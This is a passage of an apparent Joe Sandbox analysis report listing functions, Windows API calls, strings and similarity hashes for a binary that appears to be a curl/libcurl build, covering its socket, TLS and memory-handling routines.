Part of subcall function 000DD33A: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,LoadLibraryExA,?,?,?,?,?,000F4EA1,?,?,000DD2C2), ref: 000DD363
Part of subcall function 000DD33A: _mbspbrk.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(security.dll,00117348,?,?,?,?,?,000F4EA1,?,?,000DD2C2), ref: 000DD374
Part of subcall function 000DD33A: LoadLibraryExA.KERNELBASE(?,?,?,000F4EA1,?,?,000DD2C2), ref: 000DD3B6

GetProcAddress.KERNELBASE(00000000,InitSecurityInterfaceA,?,?,000DD2C2), ref: 000F4EB0

Strings

InitSecurityInterfaceA, xrefs: 000F4EAA
security.dll, xrefs: 000F4E94
secur32.dll, xrefs: 000F4E8D

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: AddressProc$HandleModule$LibraryLoad_mbspbrk
String ID: InitSecurityInterfaceA$secur32.dll$security.dll
API String ID: 2293913591-3788156360
Opcode ID: 13b8f7a38b8333569385fd940b1316c935e0afd569bfd3e3ebec5ce4b8142a8a
Instruction ID: 1f6dca60acf5242acf41eda28f0709f40d797cec11ac34453dc05a286cdb551d
Opcode Fuzzy Hash: 13b8f7a38b8333569385fd940b1316c935e0afd569bfd3e3ebec5ce4b8142a8a
Instruction Fuzzy Hash: 88F0E971A047166AEF652B387D1A7AB2395EB80714F00453AEA00E69C5FB70CC968650

Function 000E1CDF Relevance: 6.3, APIs: 5, Instructions: 82COMMON

Download Yara Rule

APIs

calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,000D2254,?,?,?,000C8B8E), ref: 000E1CFE
calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,000D2254,?,?,?,000C8B8E), ref: 000E1D28
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,000C8B8E), ref: 000E1D45

Part of subcall function 000E1AEE: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,74F81980,?,000E1D52,?,?,?,?,000C8B8E), ref: 000E1AF5
Part of subcall function 000E1AEE: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,000E1D52,?,?,?,?,000C8B8E), ref: 000E1B03
Part of subcall function 000E1AEE: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,000E1D52,?,?,?,?,000C8B8E), ref: 000E1B11

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,000C8B8E), ref: 000E1DAC
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,000C8B8E), ref: 000E1DCC

Part of subcall function 000E7F41: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E8006
Part of subcall function 000E7F41: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E8023

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$__acrt_iob_func$calloc
String ID:
API String ID: 3275786289-0
Opcode ID: e244ab542f179d4f575e8dc886d6a82bbc16790aca0decae0fac11c3e2abea75
Instruction ID: ce7e3000b1ea2ce521bc0a179a82677bf269828b47fe242e0b90c7d95b7e5bb5
Opcode Fuzzy Hash: e244ab542f179d4f575e8dc886d6a82bbc16790aca0decae0fac11c3e2abea75
Instruction Fuzzy Hash: 22219331744616EFDB189F25EC056EDBBF5FB84360F20812AE429E72D1DBB028518B95

Function 000FFEA6 Relevance: 6.1, APIs: 4, Instructions: 128networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,?,?,?), ref: 000FFEC0
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 000FFF44
freeaddrinfo.WS2_32(00000000,?,?), ref: 000FFFCE
WSASetLastError.WS2_32(00002AF9,?,?), ref: 000FFFF2

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: ErrorLastfreeaddrinfogetaddrinfomalloc
String ID:
API String ID: 2354400463-0
Opcode ID: 9cbf01977ddc7689c7d8cfd570b9cb9f483f0d2197a0b611152d5551a33843ce
Instruction ID: c94e45e722638aae71ef2113334bdd5893355c45b7c4508eb43aa007f9b154e1
Opcode Fuzzy Hash: 9cbf01977ddc7689c7d8cfd570b9cb9f483f0d2197a0b611152d5551a33843ce
Instruction Fuzzy Hash: B4417B72A0060BEBCB24CFA4D480ABAB7F5BF45714F10853EE64597A51D770A948DB90

Function 000CCF30 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 92COMMON

Download Yara Rule

APIs

Part of subcall function 000C32D3: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008), ref: 000C32F6

calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000CCF70

Strings

out of memory, xrefs: 000CCF45
Q, xrefs: 000CCFD9
hnd = curl_easy_init();, xrefs: 000CCF30

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: callocmalloc
String ID: hnd = curl_easy_init();$out of memory$Q
API String ID: 1635859522-3006749264
Opcode ID: 30d305c97f0e791f2975f467f48fd614765b46772b714448bd560a38b4666209
Instruction ID: ff852f0cdcc0ff6708b01f8f314830721849dd3e4c4eae30546a1ad11ff44747
Opcode Fuzzy Hash: 30d305c97f0e791f2975f467f48fd614765b46772b714448bd560a38b4666209
Instruction Fuzzy Hash: 5521C771B0431067DB24AB75984AFEE7B95AF40760F14403EF90AA7387DA70AD468691

Function 000C903B Relevance: 6.1, APIs: 4, Instructions: 91fileCOMMON

Download Yara Rule

APIs

fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,Failed to create/open output), ref: 000C909C
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?), ref: 000C90D7
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(00117668,?), ref: 000C90E8
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?), ref: 000C9107

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: fputs$fwrite
String ID:
API String ID: 2206100360-0
Opcode ID: 2ee36c61188540d6a8f5c20686a2b5a198ac53cf995b2908a1fd1cb376bfe8f9
Instruction ID: f021862e3d3f973101d4fd87749fb330113776d57bc30f18089a4b08cbf2633a
Opcode Fuzzy Hash: 2ee36c61188540d6a8f5c20686a2b5a198ac53cf995b2908a1fd1cb376bfe8f9
Instruction Fuzzy Hash: 5131E536904206EFCB148FA8D989EECFBF1EF84340B2481A9EC5593655DB72AD45CB90

Function 000DF1BA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000DF255

Part of subcall function 000D941D: __alldvrm.LIBCMT ref: 000D9466

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000DF287

Strings

Connection time-out, xrefs: 000DF1ED

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__alldvrm
String ID: Connection time-out
API String ID: 67483490-165637984
Opcode ID: a6e2ad5fc3041275adcd7c5e622709815823d0beb90a0c59355f7fe0c3ceaae8
Instruction ID: b0c3ee85130c7d9a12ab2a47f0c203e1d567153117062f5d09a87c4d9f503d2b
Opcode Fuzzy Hash: a6e2ad5fc3041275adcd7c5e622709815823d0beb90a0c59355f7fe0c3ceaae8
Instruction Fuzzy Hash: 21517371B04706AFEB18DF69D845ABEB7E5EF84710F10813BE516DB381DB70A9418B90

Function 001055C7 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

select/poll on SSL/TLS socket, errno: %d, xrefs: 001057B9
SSL/TLS connection timeout, xrefs: 001057CB

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID:
String ID: SSL/TLS connection timeout$select/poll on SSL/TLS socket, errno: %d
API String ID: 0-3791222319
Opcode ID: ca9f156387625bbad795f1fafd8167a5743f033f6e9042586459f9e2f0a69df3
Instruction ID: 59bb32a1e25d0d3e79f952d775f42ec21790ffd5b3ce2366ed8598649f1f5b41
Opcode Fuzzy Hash: ca9f156387625bbad795f1fafd8167a5743f033f6e9042586459f9e2f0a69df3
Instruction Fuzzy Hash: 8D510D75200B46DBDB29DE2888956BB77E7AF85320FA0491DF8C6C72D1DBB0D8408F51

Function 000DD7C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

Part of subcall function 000DD482: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DD52F

send.WS2_32(?,?,?,00000000), ref: 000DD80F
WSAGetLastError.WS2_32 ref: 000DD81F

Strings

Send failure: %s, xrefs: 000DD849

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: ErrorLastmallocsend
String ID: Send failure: %s
API String ID: 1822245873-857917747
Opcode ID: d78dd6d3f110c6e01b9916230462801e0ed8a21df54710c68529a3d6c91a3fe3
Instruction ID: ca2d0e3a079c7bf6533394c412fe0a701eabe49f57561a56768ec7682ac5594f
Opcode Fuzzy Hash: d78dd6d3f110c6e01b9916230462801e0ed8a21df54710c68529a3d6c91a3fe3
Instruction Fuzzy Hash: B011B171A003089BC7259F68DC41ADEB7B9FF88320F10456BE515973C1DBB099818BA0

Function 000DED5E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 000DED8A
WSAGetLastError.WS2_32 ref: 000DED95

Part of subcall function 000DA0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000DA0C3
Part of subcall function 000DA0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA0CB
Part of subcall function 000DA0B8: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA0DD
Part of subcall function 000DA0B8: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0(000000FF), ref: 000DA0EC
Part of subcall function 000DA0B8: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 000DA0F6
Part of subcall function 000DA0B8: _strrchr.LIBCMT ref: 000DA142
Part of subcall function 000DA0B8: _strrchr.LIBCMT ref: 000DA15C
Part of subcall function 000DA0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA173
Part of subcall function 000DA0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA180
Part of subcall function 000DA0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000DA188
Part of subcall function 000DA0B8: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 000DA193

Strings

Could not set TCP_NODELAY: %s, xrefs: 000DEDAA

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: ErrorLast$_errno$_strrchr$__sys_errlist__sys_nerrsetsockoptstrncpy
String ID: Could not set TCP_NODELAY: %s
API String ID: 2763351927-4027281243
Opcode ID: 3504fe53877e58e0148db8ccd02920df645341205a05e1a49e7a86447bde352a
Instruction ID: 044ea791a807b744466b2bdbc54e284475accdbf824e7f95a16b843da04c7555
Opcode Fuzzy Hash: 3504fe53877e58e0148db8ccd02920df645341205a05e1a49e7a86447bde352a
Instruction Fuzzy Hash: B2F09670A00314ABDB28AB60DC06EEE77A9DF59300F4041BEF44596281EAB49A854E95

Function 000DE272 Relevance: 4.5, APIs: 3, Instructions: 42networkCOMMON

Download Yara Rule

APIs

SleepEx.KERNELBASE(00000000,00000000), ref: 000DE28C
getsockopt.WS2_32(?,0000FFFF,00001007,?,00000004), ref: 000DE2A5
WSAGetLastError.WS2_32(?,0000FFFF,00001007,?,00000004), ref: 000DE2AF

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: ErrorLastSleepgetsockopt
String ID:
API String ID: 3033474312-0
Opcode ID: c14bd7672ed2b9f6b57282357511a7f04109cb64df4cb9151dfcedb85eee3186
Instruction ID: 35416665e83b946e237cabcb1ac1f361432c1a9ee6f2cfe5d5d6875c30388f61
Opcode Fuzzy Hash: c14bd7672ed2b9f6b57282357511a7f04109cb64df4cb9151dfcedb85eee3186
Instruction Fuzzy Hash: DBF06DB1600749EEE7249BD6CD84AFEBBEDEB4A314F20416AF505D6380E6709D449670

Function 000D850E Relevance: 4.1, APIs: 3, Instructions: 367COMMON

Download Yara Rule

APIs

Part of subcall function 000EF90F: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000EF962

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D86E0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D8712
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D875C

Part of subcall function 000D941D: __alldvrm.LIBCMT ref: 000D9466

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$Unothrow_t@std@@@__alldvrm__ehfuncinfo$??2@
String ID:
API String ID: 256925405-0
Opcode ID: 0831f31e4308e7b9a60e54b69b80bee4a251835ba62f723af0c146f751efd1e4
Instruction ID: 4e46bc8b8fc60189ba55fd222c546680a22678be56f1f2a002c207573a1d9a94
Opcode Fuzzy Hash: 0831f31e4308e7b9a60e54b69b80bee4a251835ba62f723af0c146f751efd1e4
Instruction Fuzzy Hash: 85D18031E043459BDF14DF5898856EEB7F2AF85320F28816BE845BF386DE719C458BA0

Function 000D8063 Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

operation aborted by pre-request callback, xrefs: 000D80B5

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free
String ID: operation aborted by pre-request callback
API String ID: 1294909896-1824986975
Opcode ID: c2dfc67bac3787b271bc107a6b67665b5887c09acee757960ecb77ccb7f94f1f
Instruction ID: 7cdca089539c428ed9815d549b35cc1b5ff23527bb4b9fb0da2994a57d591d06
Opcode Fuzzy Hash: c2dfc67bac3787b271bc107a6b67665b5887c09acee757960ecb77ccb7f94f1f
Instruction Fuzzy Hash: E691D131A043459BDF249F68D8957EEBBE6AF84310F28817BD805AB3C2DE754C468B61

Function 000CCA6A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

no transfer performed, xrefs: 000CCA7A

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID:
String ID: no transfer performed
API String ID: 0-1612002148
Opcode ID: f9eadf65836aece0d3249b9edffc1863de4b16a4a14332c98ffddf82a1806cc0
Instruction ID: 3e04d786ef82f0d442299f4a09e102ca87c770d218477f6f9d2e6c3d51bde664
Opcode Fuzzy Hash: f9eadf65836aece0d3249b9edffc1863de4b16a4a14332c98ffddf82a1806cc0
Instruction Fuzzy Hash: D4312572D0064A6BEB65DBF8D48AFAD77F0AB44310F1802ADD80AA725ADF31DD058380

Function 000DF472 Relevance: 3.1, APIs: 2, Instructions: 91networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(?,?,?), ref: 000DF530
ioctlsocket.WS2_32(?,8004667E,?), ref: 000DF566

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: ioctlsocketsocket
String ID:
API String ID: 416004797-0
Opcode ID: 5aec247e622c640974456bcf968b03351a9ccdde4effa4ec1b168b0d5d29c992
Instruction ID: 625e3410c308ebd0d2054f2514730270dbc0dfb3de58dba7d702a784e536687d
Opcode Fuzzy Hash: 5aec247e622c640974456bcf968b03351a9ccdde4effa4ec1b168b0d5d29c992
Instruction Fuzzy Hash: A7316931A00616EFDB28CF24D884BAAB7F2FF48314F1085AAE41A97251D731A984CF60

Function 000DD482 Relevance: 3.1, APIs: 2, Instructions: 77networkCOMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DD52F
recv.WS2_32(?,?,?,00000000), ref: 000DD56C

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: mallocrecv
String ID:
API String ID: 410377367-0
Opcode ID: 8c14be21d1ca3775a7df7da54f56535f2915ac9fd58d4ba4bb9c70e01bd6d543
Instruction ID: 0cd745e8fe2779df56ec12f4dfdbbcd4d9bfa68b1633061c3c265e80e427e4ee
Opcode Fuzzy Hash: 8c14be21d1ca3775a7df7da54f56535f2915ac9fd58d4ba4bb9c70e01bd6d543
Instruction Fuzzy Hash: 1C318071A05B06ABDB569E2CE8857F5B3E4FB44339F74472BA858C33A4D720A824C690

Function 000E1E1F Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 74COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1E6B

Strings

Closing connection %ld, xrefs: 000E1E29

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free
String ID: Closing connection %ld
API String ID: 1294909896-1512264877
Opcode ID: b2f53e907b18a755154d010bd44185ee31e6ed43cbeb841d8f161715889d264b
Instruction ID: 70dc09493b319bff0517fbc1fa4383de98404632e8edbbb04a2d82e46b4ddf70
Opcode Fuzzy Hash: b2f53e907b18a755154d010bd44185ee31e6ed43cbeb841d8f161715889d264b
Instruction Fuzzy Hash: 852184317006019FD7589A2D9C85BEAF3DAAF84750F24403AF819DB3A6CF74AC518690

Function 000D8B08 Relevance: 3.1, APIs: 2, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSACloseEvent.WS2_32(?), ref: 000D8BC2
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D8BD7

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: CloseEventfree
String ID:
API String ID: 126896923-0
Opcode ID: e0fad381e6b6ff65fa6ef3238a8bedb7ba3b3ad03ca609ee9e9359fce100dfb0
Instruction ID: a975fe5f4efff8be2e44093487cdc5dd5f322a32f6e235abb21d76bfbe65fc8f
Opcode Fuzzy Hash: e0fad381e6b6ff65fa6ef3238a8bedb7ba3b3ad03ca609ee9e9359fce100dfb0
Instruction Fuzzy Hash: CC21C272600B51DFD729EB21C8547AAB3E1FF90732F14C82BD44262692CF74A845CBE1

Function 000E88E1 Relevance: 3.1, APIs: 2, Instructions: 67COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E8C01,?,?,00000000), ref: 000E8928
InitializeCriticalSectionEx.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000001,000E8C01,?,?,00000000), ref: 000E8936

Part of subcall function 0010699F: socket.WS2_32(00000002,00000001,00000006), ref: 001069C9
Part of subcall function 0010699F: htonl.WS2_32(7F000001), ref: 001069F0
Part of subcall function 0010699F: setsockopt.WS2_32(00000000,0000FFFF,00000004,?,00000004), ref: 00106A12
Part of subcall function 0010699F: bind.WS2_32(00000000,?,00000010), ref: 00106A27
Part of subcall function 0010699F: getsockname.WS2_32(00000000,?,00000010), ref: 00106A3E
Part of subcall function 0010699F: listen.WS2_32(00000000,00000001), ref: 00106A59
Part of subcall function 0010699F: socket.WS2_32(00000002,00000001,00000000), ref: 00106A6F
Part of subcall function 0010699F: connect.WS2_32(00000000,?,00000010), ref: 00106A86
Part of subcall function 0010699F: ioctlsocket.WS2_32(00000000,8004667E,?), ref: 00106AA5

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
